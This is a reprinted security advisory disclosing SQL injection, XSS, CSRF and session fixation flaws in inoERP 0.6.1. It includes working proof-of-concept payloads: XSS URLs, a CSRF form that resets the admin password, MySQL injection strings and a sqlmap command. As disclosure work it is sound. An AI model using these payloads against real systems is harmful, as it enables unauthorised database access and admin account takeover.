inoERP 0.6.1 CSRF / XSS / SQL Injection

2017-03-27T00:00:00
ID PACKETSTORM:141823
Type packetstorm
Reporter foxmole.com
Modified 2017-03-27T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
=== FOXMOLE - Security Advisory 2017-01-25 ===  
  
inoERP - Multiple Issues  
~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Affected Versions  
=================  
inoERP 0.6.1  
  
Issue Overview  
==============  
Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation  
Technical Risk: critical  
Likelihood of Exploitation: medium  
Vendor: inoERP  
Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP  
Credits: FOXMOLE employee Tim Herres  
Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt  
Advisory Status: Public  
OVE-ID: OVE-20170126-0002  
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)  
  
  
Impact  
======  
There are multiple SQL Injection vulnerabilities, exploitable without authentication.  
An attacker could use the SQL Injection to access the database in an unsafe way.  
This means there is a high impact to all applications.  
The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.  
  
  
Issue Description  
=================  
The following findings are only examples, there are quite more. The whole application should be reviewed.  
  
All items tested using FF52.  
  
1.) Cross Site Scripting:  
Stored:  
Create a new Question in the -->Forum --> Ask a question  
Vulnerable fields : Title, Content  
Used Payload: Test<script>alert("xss")</script>  
  
Response:  
[...]  
<title>Test<script>alert("xss")</script> - inoERP!</title>  
[...]  
  
The latest questions are included in the start page which means the entered payload gets executed directly in the start page.  
  
Reflected:  
With Auth:  
http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7  
http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)  
%3C/scRipt%3E  
http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report  
  
Unauthenticated:  
http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E  
  
2.) No protection against Cross Site Request Forgery Attacks:  
PoC: Changing the admin user credentials.  
  
<html>  
<body>  
<form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">  
<input type="hidden" name="headerData[0][name]" value="user_id[]" />  
<input type="hidden" name="headerData[0][value]" value="1" />  
<input type="hidden" name="headerData[1][name]" value="username[]" />  
<input type="hidden" name="headerData[1][value]" value="inoerp" />  
<input type="hidden" name="headerData[2][name]" value="enteredPassword[]" />  
<input type="hidden" name="headerData[2][value]" value="test" />  
<input type="hidden" name="headerData[3][name]" value="enteredRePassword[]" />  
<input type="hidden" name="headerData[3][value]" value="test" />  
<input type="hidden" name="headerData[4][name]" value="first_name[]" />  
<input type="hidden" name="headerData[4][value]" value="inoerp" />  
<input type="hidden" name="headerData[5][name]" value="last_name[]" />  
<input type="hidden" name="headerData[5][value]" value="inoerp" />  
<input type="hidden" name="headerData[6][name]" value="email[]" />  
<input type="hidden" name="headerData[6][value]" value="inoerp@no-site.com" />  
<input type="hidden" name="headerData[7][name]" value="phone[]" />  
[..snipped...]  
  
If a privileged user activates the request, the admin user id=1 is set to "test".  
  
3.) SQL Injection:  
Auth required:No  
#####  
http://192.168.241.143/inoerp/form.php?  
Parameter: module_code (GET)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or  
GROUP BY clause  
Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN  
0x74657374 ELSE 0x28 END))-- qkmO  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: module_code=test' AND (SELECT 8706 FROM(SELECT  
COUNT(*),CONCAT(0x716b7a6271,(SELECT  
(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq  
  
Type: stacked queries  
Title: MySQL > 5.0.11 stacked queries (comment)  
Payload: module_code=test';SELECT SLEEP(5)#  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: module_code=test' OR SLEEP(5)-- STgC  
  
Exploitable using e.g. SQLMAP  
  
Blind SQL Injection:  
sqlmap -u  
"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"  
-p "content_type%5b%5d" --dbms="MySQL"  
Parameter: content_type[] (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: content_type[]=-8366' OR 7798=7798 AND  
'eanR'='eanR&search_text=3&search_document_list[]=all  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: content_type[]=test' OR SLEEP(5) AND  
'exIO'='exIO&search_text=3&search_document_list[]=all  
#####  
  
4.) Session Fixation:  
After a successful login the SessionID PHPSESSID remains the same:  
Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2  
After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2  
  
  
  
  
Temporary Workaround and Fix  
============================  
FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.  
  
  
  
History  
=======  
2017-01-25 Issue discovered  
2017-01-26 Vendor contacted -> no response  
2017-02-20 Vendor contacted again -> no response  
2017-03-06 Vendor contacted again -> no response  
2017-03-27 Advisory Release  
  
  
GPG Signature  
=============  
This advisory is signed with the GPG key of the FOXMOLE advisories team.  
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCAAdFiEEjrQMZqTYqiY2IftqOBIJIZnjJ3wFAljYxkQACgkQOBIJIZnj  
J3xoqg//SGIzPCv5wyWJsYfChEfix+7NTjFOQfUtbfzqd7aLVYuSf/UWPBWdiA37  
lmtyWuJnq+JBXL654fOvxjXaZkUE/NXmn2Eqz/ICL33ZHeXmTM7V/PTbrphL1xw3  
NDvSlpxShRMLjSaP/AmQkRRmAqzLq8M6g71+aooq8YHYshXwhPOnWLym5GDQhCIp  
9IruFoXKVVhxVtopy7+bvol5dUGdfGCQDAW5STc3L7Cvh0DoMyQvtvAZoe+kdsMd  
yVf42j3ng+5H3zsdSz26dgrPWOqFnD0VcG6dsw0RgUl5VwfsvwzRDytsIck3jk6B  
YTlIkrrVNg6P1gqHH8DSqrGIXR61LQj0jaO24HizXv9/oRsrxRdNeRoe4QwaSNN0  
QsPFT4JNW+haGt7sq2AOLbnZyTWnv/U7w7kq2kOn5/sVeHi9BYBBy11mZ6m9iN+z  
W4deHitwT4arJScrWvzeLYvQkLudxiomYslQZ4GjfYi4j4Fw5kaPfsDOk1JPzlym  
q47Bc70trmF2RkRTmNzHE0W6v/Dmpt5JlIbrBCABsQp+3uc7ovCEi+ggu4seeQq/  
YMEe0uA0zheA24a7XSyuybZN0wpRz1Uq7/umPYHmwO/UDfvJcBan3pIBCTFb7qRy  
CZU/x6ZOg/WZOHHJ7OWvkIx1A4/5pH5+BfnzeLfceyPIZX1Qcho=  
=aQdY  
-----END PGP SIGNATURE-----  
`